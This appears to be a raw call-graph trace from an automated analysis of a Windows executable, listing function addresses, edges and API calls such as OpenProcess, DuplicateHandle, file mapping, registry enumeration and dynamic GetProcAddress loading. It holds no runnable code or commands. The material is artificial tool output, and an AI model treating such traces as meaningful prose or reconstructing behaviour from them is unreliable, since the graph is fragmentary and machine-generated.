40e540 39037->39031 39084 40e2ab 30 API calls 39037->39084 39039 40e5e3 39038->39039 39039->39015 39042 406214 22 API calls 39041->39042 39043 40e03c 39042->39043 39044 40e16b 39043->39044 39045 40dd85 74 API calls 39043->39045 39044->39023 39046 40e06b 39045->39046 39046->39044 39047 40afcf ??2@YAPAXI ??3@YAXPAX 39046->39047 39048 40e08d OpenProcess 39047->39048 39049 40e0a4 GetCurrentProcess DuplicateHandle 39048->39049 39053 40e152 39048->39053 39050 40e0d0 GetFileSize 39049->39050 39051 40e14a CloseHandle 39049->39051 39054 409a45 GetTempPathW GetWindowsDirectoryW GetTempFileNameW 39050->39054 39051->39053 39052 40e160 39056 40b04b ??3@YAXPAX 39052->39056 39053->39052 39055 406214 22 API calls 39053->39055 39057 40e0ea 39054->39057 39055->39052 39056->39044 39058 4096dc CreateFileW 39057->39058 39059 40e0f1 CreateFileMappingW 39058->39059 39060 40e140 CloseHandle CloseHandle 39059->39060 39061 40e10b MapViewOfFile 39059->39061 39060->39051 39062 40e13b CloseHandle 39061->39062 39063 40e11f WriteFile UnmapViewOfFile 39061->39063 39062->39060 39063->39062 39065 40e18c 39064->39065 39066 406b90 11 API calls 39065->39066 39067 40e19f 39066->39067 39068 40e1a7 memset 39067->39068 39069 40e299 39067->39069 39074 40e1e8 39068->39074 39070 4069a3 ??3@YAXPAX free 39069->39070 39071 40e2a4 39070->39071 39071->39037 39072 406e8f 13 API calls 39072->39074 39073 406b53 SetFilePointerEx ReadFile 39073->39074 39074->39072 39074->39073 39075 40e283 39074->39075 39076 40dd50 _wcsicmp 39074->39076 39080 40742e 8 API calls 39074->39080 39081 40aae3 wcslen wcslen _memicmp 39074->39081 39082 40e244 _snwprintf 39074->39082 39077 40e291 39075->39077 39078 40e288 free 39075->39078 39076->39074 39079 40aa04 free 39077->39079 39078->39077 39079->39069 39080->39074 39081->39074 39083 40a8d0 7 API calls 39082->39083 39083->39074 39084->39037 39085->39022 39088 40a980 39086->39088 39087 40a8bb 39087->38947 39087->38948 39088->39087 39089 40a995 _wcsicmp 39088->39089 39090 40a99c wcscmp 39088->39090 39089->39088 39090->39088 39091->38951 39092->38955 39094 40aa23 RegEnumValueW 39093->39094 39094->38962 39094->38963 39096 405335 39095->39096 39097 40522a 39095->39097 39096->38544 39098 40b2cc 27 API calls 39097->39098 39099 405234 39098->39099 39100 40a804 8 API calls 39099->39100 39101 40523a 39100->39101 39140 40b273 39101->39140 39103 405248 _mbscpy _mbscat GetProcAddress 39104 40b273 27 API calls 39103->39104 39105 405279 39104->39105 39143 405211 GetProcAddress 39105->39143 39107 405282 39108 40b273 27 API calls 39107->39108 39109 40528f 39108->39109 39144 405211 GetProcAddress 39109->39144 39111 405298 39112 40b273 27 API calls 39111->39112 39113 4052a5 39112->39113 39145 405211 GetProcAddress 39113->39145 39115 4052ae 39116 40b273 27 API calls 39115->39116 39117 4052bb 39116->39117 39146 405211 GetProcAddress 39117->39146 39119 4052c4 39120 40b273 27 API calls 39119->39120 39121 4052d1 39120->39121 39147 405211 GetProcAddress 39121->39147 39123 4052da 39124 40b273 27 API calls 39123->39124 39125 4052e7 39124->39125 39148 405211 GetProcAddress 39125->39148 39127 4052f0 39128 40b273 27 API calls 39127->39128 39129 4052fd 39128->39129 39149 405211 GetProcAddress 39129->39149 39131 405306 39132 40b273 27 API calls 39131->39132 39133 405313 39132->39133 39150 405211 GetProcAddress 39133->39150 39135 40531c 39136 40b273 27 API calls 39135->39136 39137 405329 39136->39137 39151 405211 GetProcAddress 39137->39151 39139 405332 39139->39096 39141 40b58d 27 API calls 39140->39141 39142 40b18c 39141->39142 39142->39103 39143->39107 39144->39111 39145->39115 39146->39119 39147->39123 39148->39127 39149->39131 39150->39135 39151->39139 39153 405220 39 API calls 39152->39153 39154 405369 39153->39154 39154->38980 39154->38981 39155->38984 39156->38987 39157->38983 39158->38981 39160 40440c FreeLibrary 39159->39160 39161 40436d 39160->39161 39162 40a804 8 API calls 39161->39162 39163 404377 39162->39163 39164 404383 39163->39164 39165 404405 39163->39165 39166 40b273 27 API calls 39164->39166 39165->38553 39165->38555 39165->38556 39167 40438d GetProcAddress 39166->39167 39168 40b273 27 API calls 39167->39168 39169 4043a7 GetProcAddress 39168->39169 39170 40b273 27 API calls 39169->39170 39171 4043ba GetProcAddress 39170->39171 39172 40b273 27 API calls 39171->39172 39173 4043ce GetProcAddress 39172->39173 39174 40b273 27 API calls 39173->39174 39175 4043e2 GetProcAddress 39174->39175 39176 4043f1 39175->39176 39177 4043f7 39176->39177 39178 40440c FreeLibrary 39176->39178 39177->39165 39178->39165 39180 404413 FreeLibrary 39179->39180 39181 40441e 39179->39181 39180->39181 39181->38570 39182->38562 39184 40442e 39183->39184 39185 40447e 39183->39185 39186 40b2cc 27 API calls 39184->39186 39185->38562 39187 404438 39186->39187 39188 40a804 8 API calls 39187->39188 39189 40443e 39188->39189 39190 404445 39189->39190 39191 404467 39189->39191 39192 40b273 27 API calls 39190->39192 39191->39185 39193 404475 FreeLibrary 39191->39193 39194 40444f GetProcAddress 39192->39194 39193->39185 39194->39191 39195 404460 39194->39195 39195->39191 39197 4135f6 39196->39197 39198 4135eb FreeLibrary 39196->39198 39197->38573 39198->39197 39200 4449c4 39199->39200 39201 444a52 39199->39201 39202 40b2cc 27 API calls 39200->39202 39201->38590 39201->38591 39203 4449cb 39202->39203 39204 40a804 8 API calls 39203->39204 39205 4449d1 39204->39205 39206 40b273 27 API calls 39205->39206 39207 4449dc GetProcAddress 39206->39207 39208 40b273 27 API calls 39207->39208 39209 4449f3 GetProcAddress 39208->39209 39210 40b273 27 API calls 39209->39210 39211 444a04 GetProcAddress 39210->39211 39212 40b273 27 API calls 39211->39212 39213 444a15 GetProcAddress 39212->39213 39214 40b273 27 API calls 39213->39214 39215 444a26 GetProcAddress 39214->39215 39216 40b273 27 API calls 39215->39216 39217 444a37 GetProcAddress 39216->39217 39218 40b273 27 API calls 39217->39218 39219 444a48 GetProcAddress 39218->39219 39219->39201 39220->38601 39221->38601 39222->38601 39223->38601 39224->38592 39226 403a29 39225->39226 39240 403bed memset memset 39226->39240 39228 403ae7 39253 40b1ab free free 39228->39253 39229 403a3f memset 39235 403a2f 39229->39235 39231 403aef 39231->38608 39232 409b98 GetFileAttributesW 39232->39235 39233 40a8d0 7 API calls 39233->39235 39234 409d1f 6 API calls 39234->39235 39235->39228 39235->39229 39235->39232 39235->39233 39235->39234 39237 40a051 GetFileTime CloseHandle 39236->39237 39238 4039ca CompareFileTime 39236->39238 39237->39238 39238->38608 39239->38609 39241 414c2e 16 API calls 39240->39241 39242 403c38 39241->39242 39243 409719 2 API calls 39242->39243 39244 403c3f wcscat 39243->39244 39245 414c2e 16 API calls 39244->39245 39246 403c61 39245->39246 39247 409719 2 API calls 39246->39247 39248 403c68 wcscat 39247->39248 39254 403af5 39248->39254 39251 403af5 20 API calls 39252 403c95 39251->39252 39252->39235 39253->39231 39255 403b02 39254->39255 39256 40ae18 9 API calls 39255->39256 39264 403b37 39256->39264 39257 403bdb 39259 40aebe FindClose 39257->39259 39258 40add4 wcscmp wcscmp 39258->39264 39260 403be6 39259->39260 39260->39251 39261 40ae18 9 API calls 39261->39264 39262 40ae51 9 API calls 39262->39264 39263 40aebe FindClose 39263->39264 39264->39257 39264->39258 39264->39261 39264->39262 39264->39263 39265 40a8d0 7 API calls 39264->39265 39265->39264 39267 409d1f 6 API calls 39266->39267 39268 404190 39267->39268 39281 409b98 GetFileAttributesW 39268->39281 39270 40419c 39271 4041a7 6 API calls 39270->39271 39272 40435c 39270->39272 39274 40424f 39271->39274 39272->38635 39274->39272 39275 40425e memset 39274->39275 39277 409d1f 6 API calls 39274->39277 39278 40a8ab 9 API calls 39274->39278 39282 414842 39274->39282 39275->39274 39276 404296 wcscpy 39275->39276 39276->39274 39277->39274 39279 4042b6 memset memset _snwprintf wcscpy 39278->39279 39279->39274 39280->38633 39281->39270 39285 41443e 39282->39285 39284 414866 39284->39274 39286 41444b 39285->39286 39287 414451 39286->39287 39288 4144a3 GetPrivateProfileStringW 39286->39288 39289 414491 39287->39289 39290 414455 wcschr 39287->39290 39288->39284 39291 414495 WritePrivateProfileStringW 39289->39291 39290->39289 39292 414463 _snwprintf 39290->39292 39291->39284 39292->39291 39293->38639 39295 40b2cc 27 API calls 39294->39295 39296 409615 39295->39296 39297 409d1f 6 API calls 39296->39297 39298 409625 39297->39298 39323 409b98 GetFileAttributesW 39298->39323 39300 409634 39301 409648 39300->39301 39324 4091b8 memset 39300->39324 39303 40b2cc 27 API calls 39301->39303 39305 408801 39301->39305 39304 40965d 39303->39304 39306 409d1f 6 API calls 39304->39306 39305->38642 39305->38643 39307 40966d 39306->39307 39376 409b98 GetFileAttributesW 39307->39376 39309 40967c 39309->39305 39310 409681 39309->39310 39377 409529 72 API calls 39310->39377 39312 409690 39312->39305 39313->38665 39314->38642 39315->38670 39316->38642 39323->39300 39378 40a6e6 WideCharToMultiByte 39324->39378 39326 409202 39379 444432 39326->39379 39329 40b273 27 API calls 39330 409236 39329->39330 39425 438552 39330->39425 39333 409383 39335 40b273 27 API calls 39333->39335 39337 409399 39335->39337 39336 409254 39338 40937b 39336->39338 39446 4253cf 17 API calls 39336->39446 39339 438552 134 API calls 39337->39339 39450 424f26 123 API calls 39338->39450 39357 4093a3 39339->39357 39342 409267 39343 4094ff 39454 443d90 39343->39454 39346 4251c4 137 API calls 39346->39357 39348 409507 39356 40951d 39348->39356 39474 408f2f 77 API calls 39348->39474 39350 4093df 39453 424f26 123 API calls 39350->39453 39354 4253cf 17 API calls 39354->39357 39356->39301 39357->39343 39357->39346 39357->39350 39357->39354 39359 4093e4 39357->39359 39451 4253af 17 API calls 39359->39451 39366 4093ed 39452 4253af 17 API calls 39366->39452 39369 4093f9 39369->39350 39370 409409 memcmp 39369->39370 39370->39350 39371 409421 memcmp 39370->39371 39372 4094a4 memcmp 39371->39372 39373 409435 39371->39373 39372->39350 39373->39350 39376->39309 39377->39312 39378->39326 39475 4438b5 39379->39475 39381 44444c 39387 409215 39381->39387 39489 415a6d 39381->39489 39383 4442e6 11 API calls 39385 44469e 39383->39385 39384 444486 39386 4444b9 memcpy 39384->39386 39424 4444a4 39384->39424 39385->39387 39389 443d90 111 API calls 39385->39389 39493 415258 39386->39493 39387->39329 39387->39356 39389->39387 39390 444524 39391 444541 39390->39391 39392 44452a 39390->39392 39496 444316 39391->39496 39393 416935 16 API calls 39392->39393 39393->39424 39396 444316 18 API calls 39397 444563 39396->39397 39398 444316 18 API calls 39397->39398 39399 44456f 39398->39399 39400 444316 18 API calls 39399->39400 39401 44457f 39400->39401 39401->39424 39510 432d4e 39401->39510 39424->39383 39563 438460 39425->39563 39427 409240 39427->39333 39428 4251c4 39427->39428 39575 424f07 39428->39575 39430 4251e4 39431 4251f7 39430->39431 39432 4251e8 39430->39432 39583 4250f8 39431->39583 39582 4446ea 11 API calls 39432->39582 39434 4251f2 39434->39336 39436 425209 39439 425249 39436->39439 39442 4250f8 127 API calls 39436->39442 39443 425287 39436->39443 39591 4384e9 135 API calls 39436->39591 39592 424f74 124 API calls 39436->39592 39439->39443 39442->39436 39446->39342 39450->39333 39451->39366 39452->39369 39453->39343 39455 443da3 39454->39455 39456 443db6 39454->39456 39599 41707a 39455->39599 39456->39348 39458 443da8 39459 443dbc 39458->39459 39460 443dac 39458->39460 39604 4300e8 39459->39604 39612 4446ea 11 API calls 39460->39612 39474->39356 39476 4438d0 39475->39476 39487 4438c9 39475->39487 39477 415378 memcpy memcpy 39476->39477 39478 4438d5 39477->39478 39479 4154e2 10 API calls 39478->39479 39480 443906 39478->39480 39478->39487 39479->39480 39481 443970 memset 39480->39481 39480->39487 39483 44398b 39481->39483 39482 4439a0 39484 415700 10 API calls 39482->39484 39482->39487 39483->39482 39486 41975c 10 API calls 39483->39486 39485 4439c0 39484->39485 39485->39487 39488 418981 10 API calls 39485->39488 39486->39482 39487->39381 39488->39487 39490 415a77 39489->39490 39491 415a8d 39490->39491 39492 415a7e memset 39490->39492 39491->39384 39492->39491 39494 4438b5 11 API calls 39493->39494 39495 41525d 39494->39495 39495->39390 39497 444328 39496->39497 39498 444423 39497->39498 39499 44434e 39497->39499 39500 4446ea 11 API calls 39498->39500 39501 432d4e memset memset memcpy 39499->39501 39507 444381 39500->39507 39502 44435a 39501->39502 39504 444375 39502->39504 39509 44438b 39502->39509 39503 432d4e memset memset memcpy 39505 4443ec 39503->39505 39506 416935 16 API calls 39504->39506 39505->39507 39508 416935 16 API calls 39505->39508 39506->39507 39507->39396 39508->39507 39509->39503 39511 432d65 39510->39511 39512 432d58 39510->39512 39564 41703f 11 API calls 39563->39564 39565 43847a 39564->39565 39566 43848a 39565->39566 39567 43847e 39565->39567 39569 438270 134 API calls 39566->39569 39568 4446ea 11 API calls 39567->39568 39571 438488 39568->39571 39570 4384aa 39569->39570 39570->39571 39572 424f26 123 API calls 39570->39572 39571->39427 39573 4384bb 39572->39573 39574 438270 134 API calls 39573->39574 39574->39571 39576 424f1f 39575->39576 39577 424f0c 39575->39577 39579 424eea 11 API calls 39576->39579 39578 416760 11 API calls 39577->39578 39580 424f18 39578->39580 39581 424f24 39579->39581 39580->39430 39581->39430 39582->39434 39584 425108 39583->39584 39590 42510d 39583->39590 39585 424f74 124 API calls 39584->39585 39585->39590 39586 42569b 125 API calls 39587 42516e 39586->39587 39589 415c7d 16 API calls 39587->39589 39588 425115 39588->39436 39589->39588 39590->39586 39590->39588 39591->39436 39592->39436 39600 417085 39599->39600 39601 4170ab 39599->39601 39600->39601 39602 416760 11 API calls 39600->39602 39601->39458 39603 4170a4 39602->39603 39603->39458 39612->39456 39642 413f4f 39615->39642 39618 413f37 K32GetModuleFileNameExW 39619 413f4a 39618->39619 39619->38701 39621 413969 wcscpy 39620->39621 39622 41396c wcschr 39620->39622 39634 413a3a 39621->39634 39622->39621 39624 41398e 39622->39624 39647 4097f7 wcslen wcslen _memicmp 39624->39647 39626 41399a 39627 4139a4 memset 39626->39627 39628 4139e6 39626->39628 39648 409dd5 GetWindowsDirectoryW wcscpy 39627->39648 39630 413a31 wcscpy 39628->39630 39631 4139ec memset 39628->39631 39630->39634 39649 409dd5 GetWindowsDirectoryW wcscpy 39631->39649 39632 4139c9 wcscpy wcscat 39632->39634 39634->38701 39635 413a11 memcpy wcscat 39635->39634 39637 413cb0 GetModuleHandleW 39636->39637 39638 413cda 39636->39638 39637->39638 39639 413cbf GetProcAddress 39637->39639 39640 413ce3 GetProcessTimes 39638->39640 39641 413cf6 39638->39641 39639->39638 39640->38704 39641->38704 39643 413f2f 39642->39643 39644 413f54 39642->39644 39643->39618 39643->39619 39645 40a804 8 API calls 39644->39645 39646 413f5f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 39645->39646 39646->39643 39647->39626 39648->39632 39649->39635 39650->38725 39651->38748 39653 409cf9 GetVersionExW 39652->39653 39654 409d0a 39652->39654 39653->39654 39654->38754 39654->38759 39655->38760 39656->38763 39657->38765 39658->38831 39660 40bba5 39659->39660 39707 40cc26 39660->39707 39663 40bd4b 39728 40cc0c 39663->39728 39668 40b2cc 27 API calls 39669 40bbef 39668->39669 39735 40ccf0 _wcsicmp 39669->39735 39671 40bbf5 39671->39663 39736 40ccb4 6 API calls 39671->39736 39673 40bc26 39674 40cf04 17 API calls 39673->39674 39675 40bc2e 39674->39675 39676 40bd43 39675->39676 39677 40b2cc 27 API calls 39675->39677 39678 40cc0c 4 API calls 39676->39678 39679 40bc40 39677->39679 39678->39663 39737 40ccf0 _wcsicmp 39679->39737 39681 40bc46 39681->39676 39682 40bc61 memset memset WideCharToMultiByte 39681->39682 39738 40103c strlen 39682->39738 39684 40bcc0 39685 40b273 27 API calls 39684->39685 39686 40bcd0 memcmp 39685->39686 39686->39676 39687 40bce2 39686->39687 39688 404423 37 API calls 39687->39688 39689 40bd10 39688->39689 39689->39676 39690 40bd3a LocalFree 39689->39690 39691 40bd1f memcpy 39689->39691 39690->39676 39691->39690 39692->38846 39694 409a74 GetTempFileNameW 39693->39694 39695 409a66 GetWindowsDirectoryW 39693->39695 39694->38845 39695->39694 39696->38883 39697->38883 39698->38883 39699->38883 39700->38883 39701->38883 39702->38883 39703->38883 39704->38883 39705->38858 39706->38880 39739 4096c3 CreateFileW 39707->39739 39709 40cc34 39710 40cc3d GetFileSize 39709->39710 39718 40bbca 39709->39718 39711 40afcf 2 API calls 39710->39711 39712 40cc64 39711->39712 39740 40a2ef ReadFile 39712->39740 39714 40cc71 39741 40ab4a MultiByteToWideChar 39714->39741 39716 40cc95 CloseHandle 39717 40b04b ??3@YAXPAX 39716->39717 39717->39718 39718->39663 39719 40cf04 39718->39719 39720 40b633 free 39719->39720 39721 40cf14 39720->39721 39747 40b1ab free free 39721->39747 39723 40bbdd 39723->39663 39723->39668 39724 40cf1b 39724->39723 39726 40cfef 39724->39726 39748 40cd4b 39724->39748 39727 40cd4b 14 API calls 39726->39727 39727->39723 39729 40b633 free 39728->39729 39730 40cc15 39729->39730 39731 40aa04 free 39730->39731 39732 40cc1d 39731->39732 39797 40b1ab free free 39732->39797 39734 40b7d4 memset CreateFileW 39734->38838 39734->38839 39735->39671 39736->39673 39737->39681 39738->39684 39739->39709 39740->39714 39742 40ab93 39741->39742 39743 40ab6b 39741->39743 39742->39716 39744 40a9ce 4 API calls 39743->39744 39745 40ab74 39744->39745 39746 40ab7c MultiByteToWideChar 39745->39746 39746->39742 39747->39724 39749 40cd7b 39748->39749 39782 40aa29 39749->39782 39751 40cef5 39752 40aa04 free 39751->39752 39753 40cefd 39752->39753 39753->39724 39755 40aa29 6 API calls 39756 40ce1d 39755->39756 39757 40aa29 6 API calls 39756->39757 39758 40ce3e 39757->39758 39759 40ce6a 39758->39759 39790 40abb7 wcslen memmove 39758->39790 39760 40ce9f 39759->39760 39793 40abb7 wcslen memmove 39759->39793 39762 40a8d0 7 API calls 39760->39762 39765 40ceb5 39762->39765 39763 40ce56 39791 40aa71 wcslen 39763->39791 39771 40a8d0 7 API calls 39765->39771 39767 40ce8b 39794 40aa71 wcslen 39767->39794 39768 40ce5e 39792 40abb7 wcslen memmove 39768->39792 39774 40cecb 39771->39774 39772 40ce93 39795 40abb7 wcslen memmove 39772->39795 39796 40d00b malloc memcpy free free 39774->39796 39776 40cedd 39777 40aa04 free 39776->39777 39778 40cee5 39777->39778 39779 40aa04 free 39778->39779 39780 40ceed 39779->39780 39781 40aa04 free 39780->39781 39781->39751 39783 40aa33 39782->39783 39784 40aa63 39782->39784 39785 40aa44 39783->39785 39786 40aa38 wcslen 39783->39786 39784->39751 39784->39755 39787 40a9ce malloc memcpy free free 39785->39787 39786->39785 39788 40aa4d 39787->39788 39788->39784 39789 40aa51 memcpy 39788->39789 39789->39784 39790->39763 39791->39768 39792->39759 39793->39767 39794->39772 39795->39760 39796->39776 39797->39734 39798->38898 39799->38906 39809 44def7 39810 44df07 39809->39810 39811 44df00 ??3@YAXPAX 39809->39811 39812 44df17 39810->39812 39813 44df10 ??3@YAXPAX 39810->39813 39811->39810 39814 44df27 39812->39814 39815 44df20 ??3@YAXPAX 39812->39815 39813->39812 39816 44df37 39814->39816 39817 44df30 ??3@YAXPAX 39814->39817 39815->39814 39817->39816 37667 44dea5 37668 44deb5 FreeLibrary 37667->37668 37669 44dec3 37667->37669 37668->37669 39818 4148b6 FindResourceW 39819 4148cf SizeofResource 39818->39819 39822 4148f9 39818->39822 39820 4148e0 LoadResource 39819->39820 39819->39822 39821 4148ee LockResource 39820->39821 39820->39822 39821->39822 37843 415304 free 39823 441b3f 39833 43a9f6 39823->39833 39825 441b61 40006 4386af memset 39825->40006 39827 44189a 39828 4418e2 39827->39828 39832 442bd4 39827->39832 39829 4418ea 39828->39829 40007 4414a9 12 API calls 39828->40007 39832->39829 40008 441409 memset 39832->40008 39834 43aa20 39833->39834 39835 43aadf 39833->39835 39834->39835 39836 43aa34 memset 39834->39836 39835->39825 39837 43aa56 39836->39837 39838 43aa4d 39836->39838 40009 43a6e7 39837->40009 40017 42c02e memset 39838->40017 39843 43aad3 40019 4169a7 11 API calls 39843->40019 39844 43aaae 39844->39835 39844->39843 39859 43aae5 39844->39859 39845 43ac18 39848 43ac47 39845->39848 40021 42bbd5 memcpy memcpy memcpy memset memcpy 39845->40021 39849 43aca8 39848->39849 40022 438eed 16 API calls 39848->40022 39852 43acd5 39849->39852 40024 4233ae 11 API calls 39849->40024 40025 423426 11 API calls 39852->40025 39853 43ac87 40023 4233c5 16 API calls 39853->40023 39857 43ace1 40026 439811 163 API calls 39857->40026 39858 43a9f6 161 API calls 39858->39859 39859->39835 39859->39845 39859->39858 40020 439bbb 22 API calls 39859->40020 39861 43acfd 39867 43ad2c 39861->39867 40027 438eed 16 API calls 39861->40027 39863 43ad19 40028 4233c5 16 API calls 39863->40028 39864 43ad58 40029 44081d 163 API calls 39864->40029 39867->39864 39870 43add9 39867->39870 39869 43ae3a memset 39871 43ae73 39869->39871 39870->39870 40033 423426 11 API calls 39870->40033 40034 42e1c0 147 API calls 39871->40034 39872 43adab 40031 438c4e 163 API calls 39872->40031 39875 43ad6c 39875->39835 39875->39872 40030 42370b memset memcpy memset 39875->40030 39876 43adcc 40032 440f84 12 API calls 39876->40032 39877 43ae96 40035 42e1c0 147 API calls 39877->40035 39881 43aea8 39882 43aec1 39881->39882 40036 42e199 147 API calls 39881->40036 39883 43af00 39882->39883 40037 42e1c0 147 API calls 39882->40037 39883->39835 39887 43af1a 39883->39887 39888 43b3d9 39883->39888 40038 438eed 16 API calls 39887->40038 39893 43b3f6 39888->39893 39897 43b4c8 39888->39897 39890 43b60f 39890->39835 40097 4393a5 17 API calls 39890->40097 39891 43af2f 40039 4233c5 16 API calls 39891->40039 40079 432878 12 API calls 39893->40079 39895 43af51 40040 423426 11 API calls 39895->40040 39903 43b4f2 39897->39903 40085 42bbd5 memcpy memcpy memcpy memset memcpy 39897->40085 39899 43af7d 40041 423426 11 API calls 39899->40041 40086 43a76c 21 API calls 39903->40086 39904 43b529 40087 44081d 163 API calls 39904->40087 39905 43b462 40081 423330 11 API calls 39905->40081 39906 43af94 40042 423330 11 API calls 39906->40042 39910 43b47e 39915 43b497 39910->39915 40082 42374a memcpy memset memcpy memcpy memcpy 39910->40082 39911 43b544 39916 43b55c 39911->39916 40088 42c02e memset 39911->40088 39912 43b428 39912->39905 40080 432b60 16 API calls 39912->40080 39913 43afca 40043 423330 11 API calls 39913->40043 40083 4233ae 11 API calls 39915->40083 40089 43a87a 163 API calls 39916->40089 39917 43afdb 40044 4233ae 11 API calls 39917->40044 39923 43b56c 39926 43b58a 39923->39926 40090 423330 11 API calls 39923->40090 39924 43b4b1 40084 423399 11 API calls 39924->40084 39925 43afee 40045 44081d 163 API calls 39925->40045 40091 440f84 12 API calls 39926->40091 39931 43b4c1 40093 42db80 163 API calls 39931->40093 39933 43b592 40092 43a82f 16 API calls 39933->40092 39936 43b5b4 40094 438c4e 163 API calls 39936->40094 39938 43b5cf 40095 42c02e memset 39938->40095 39940 43b005 39940->39835 39944 43b01f 39940->39944 40046 42d836 163 API calls 39940->40046 39941 43b1ef 40056 4233c5 16 API calls 39941->40056 39944->39941 40054 423330 11 API calls 39944->40054 40055 42d71d 163 API calls 39944->40055 39945 43b212 40057 423330 11 API calls 39945->40057 39946 43b087 40047 4233ae 11 API calls 39946->40047 39947 43add4 39947->39890 40096 438f86 16 API calls 39947->40096 39952 43b22a 40058 42ccb5 11 API calls 39952->40058 39954 43b23f 40059 4233ae 11 API calls 39954->40059 39955 43b10f 40050 423330 11 API calls 39955->40050 39957 43b257 40060 4233ae 11 API calls 39957->40060 39961 43b129 40051 4233ae 11 API calls 39961->40051 39962 43b26e 40061 4233ae 11 API calls 39962->40061 39965 43b09a 39965->39955 40048 42cc15 19 API calls 39965->40048 40049 4233ae 11 API calls 39965->40049 39966 43b282 40062 43a87a 163 API calls 39966->40062 39968 43b13c 40052 440f84 12 API calls 39968->40052 39970 43b29d 40063 423330 11 API calls 39970->40063 39973 43b15f 40053 4233ae 11 API calls 39973->40053 39974 43b2af 39976 43b2b8 39974->39976 39977 43b2ce 39974->39977 40064 4233ae 11 API calls 39976->40064 40065 440f84 12 API calls 39977->40065 39980 43b2c9 40067 4233ae 11 API calls 39980->40067 39981 43b2da 40066 42370b memset memcpy memset 39981->40066 39984 43b2f9 40068 423330 11 API calls 39984->40068 39986 43b30b 40069 423330 11 API calls 39986->40069 39988 43b325 40070 423399 11 API calls 39988->40070 39990 43b332 40071 4233ae 11 API calls 39990->40071 39992 43b354 40072 423399 11 API calls 39992->40072 39994 43b364 40073 43a82f 16 API calls 39994->40073 39996 43b370 40074 42db80 163 API calls 39996->40074 39998 43b380 40075 438c4e 163 API calls 39998->40075 40000 43b39e 40076 423399 11 API calls 40000->40076 40002 43b3ae 40077 43a76c 21 API calls 40002->40077 40004 43b3c3 40078 423399 11 API calls 40004->40078 40006->39827 40007->39829 40008->39832 40010 43a6f5 40009->40010 40011 43a765 40009->40011 40010->40011 40098 42a115 40010->40098 40011->39835 40018 4397fd memset 40011->40018 40015 43a73d 40015->40011 40016 42a115 147 API calls 40015->40016 40016->40011 40017->39837 40018->39844 40019->39835 40020->39859 40021->39848 40022->39853 40023->39849 40024->39852 40025->39857 40026->39861 40027->39863 40028->39867 40029->39875 40030->39872 40031->39876 40032->39947 40033->39869 40034->39877 40035->39881 40036->39882 40037->39882 40038->39891 40039->39895 40040->39899 40041->39906 40042->39913 40043->39917 40044->39925 40045->39940 40046->39946 40047->39965 40048->39965 40049->39965 40050->39961 40051->39968 40052->39973 40053->39944 40054->39944 40055->39944 40056->39945 40057->39952 40058->39954 40059->39957 40060->39962 40061->39966 40062->39970 40063->39974 40064->39980 40065->39981 40066->39980 40067->39984 40068->39986 40069->39988 40070->39990 40071->39992 40072->39994 40073->39996 40074->39998 40075->40000 40076->40002 40077->40004 40078->39947 40079->39912 40080->39905 40081->39910 40082->39915 40083->39924 40084->39931 40085->39903 40086->39904 40087->39911 40088->39916 40089->39923 40090->39926 40091->39933 40092->39931 40093->39936 40094->39938 40095->39947 40096->39890 40097->39835 40099 42a175 40098->40099 40101 42a122 40098->40101 40099->40011 40104 42b13b 147 API calls 40099->40104 40101->40099 40102 42a115 147 API calls 40101->40102 40105 43a174 40101->40105 40129 42a0a8 147 API calls 40101->40129 40102->40101 40104->40015 40119 43a196 40105->40119 40120 43a19e 40105->40120 40106 43a306 40106->40119 40149 4388c4 14 API calls 40106->40149 40109 42a115 147 API calls 40109->40120 40111 43a642 40111->40119 40153 4169a7 11 API calls 40111->40153 40115 43a635 40152 42c02e memset 40115->40152 40119->40101 40120->40106 40120->40109 40120->40119 40130 42ff8c 40120->40130 40138 415a91 40120->40138 40142 4165ff 40120->40142 40145 439504 13 API calls 40120->40145 40146 4312d0 147 API calls 40120->40146 40147 42be4c memcpy memcpy memcpy memset memcpy 40120->40147 40148 43a121 11 API calls 40120->40148 40122 4169a7 11 API calls 40123 43a325 40122->40123 40123->40111 40123->40115 40123->40119 40123->40122 40124 42b5b5 memset memcpy 40123->40124 40125 42bf4c 14 API calls 40123->40125 40128 4165ff 11 API calls 40123->40128 40150 42b63e 14 API calls 40123->40150 40151 42bfcf memcpy 40123->40151 40124->40123 40125->40123 40128->40123 40129->40101 40154 43817e 40130->40154 40132 42ff99 40133 42ffe3 40132->40133 40134 42ffd0 40132->40134 40137 42ff9d 40132->40137 40159 4169a7 11 API calls 40133->40159 40158 4169a7 11 API calls 40134->40158 40137->40120 40139 415a9d 40138->40139 40140 415ab3 40139->40140 40141 415aa4 memset 40139->40141 40140->40120 40141->40140 40306 4165a0 40142->40306 40145->40120 40146->40120 40147->40120 40148->40120 40149->40123 40150->40123 40151->40123 40152->40111 40153->40119 40155 438187 40154->40155 40157 438192 40154->40157 40160 4380f6 40155->40160 40157->40132 40158->40137 40159->40137 40162 43811f 40160->40162 40161 438164 40161->40157 40162->40161 40164 4300e8 3 API calls 40162->40164 40165 437e5e 40162->40165 40164->40162 40188 437d3c 40165->40188 40167 437eb3 40167->40162 40168 437ea9 40168->40167 40173 437f22 40168->40173 40203 41f432 40168->40203 40171 437f06 40250 415c56 11 API calls 40171->40250 40175 432d4e 3 API calls 40173->40175 40176 437f7f 40173->40176 40174 437f95 40251 415c56 11 API calls 40174->40251 40175->40176 40176->40174 40177 43802b 40176->40177 40179 4165ff 11 API calls 40177->40179 40180 438054 40179->40180 40214 437371 40180->40214 40183 43806b 40184 438094 40183->40184 40252 42f50e 138 API calls 40183->40252 40186 437fa3 40184->40186 40187 4300e8 3 API calls 40184->40187 40186->40167 40253 41f638 104 API calls 40186->40253 40187->40186 40189 437d69 40188->40189 40192 437d80 40188->40192 40254 437ccb 11 API calls 40189->40254 40191 437d76 40191->40168 40192->40191 40193 437da3 40192->40193 40195 437d90 40192->40195 40196 438460 134 API calls 40193->40196 40195->40191 40258 437ccb 11 API calls 40195->40258 40199 437dcb 40196->40199 40197 437de8 40257 424f26 123 API calls 40197->40257 40199->40197 40255 444283 13 API calls 40199->40255 40201 437dfc 40256 437ccb 11 API calls 40201->40256 40204 41f54d 40203->40204 40210 41f44f 40203->40210 40205 41f466 40204->40205 40288 41c635 memset memset 40204->40288 40205->40171 40205->40173 40210->40205 40212 41f50b 40210->40212 40259 41f1a5 40210->40259 40284 41c06f memcmp 40210->40284 40285 41f3b1 90 API calls 40210->40285 40286 41f398 86 API calls 40210->40286 40212->40204 40212->40205 40287 41c295 86 API calls 40212->40287 40289 41703f 40214->40289 40216 437399 40217 43739d 40216->40217 40219 4373ac 40216->40219 40296 4446ea 11 API calls 40217->40296 40220 416935 16 API calls 40219->40220 40221 